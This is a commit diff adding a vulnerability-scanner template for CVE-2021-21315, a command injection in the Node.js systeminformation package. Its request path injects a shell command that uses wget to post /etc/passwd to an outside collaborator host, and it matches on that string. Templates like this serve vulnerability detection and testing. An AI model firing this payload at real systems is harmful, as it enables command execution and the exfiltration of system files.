Create CVE-2021-21315.yaml
parent
c56ba05165
commit
723ea55285
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2021-21315
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Node.js Systeminformation Command Injection
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
|
||||||
|
tags: node.js,cve,cve2021
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcolaborator.net)"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "wget --post-file /etc/passwd burpcolaborator.net"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue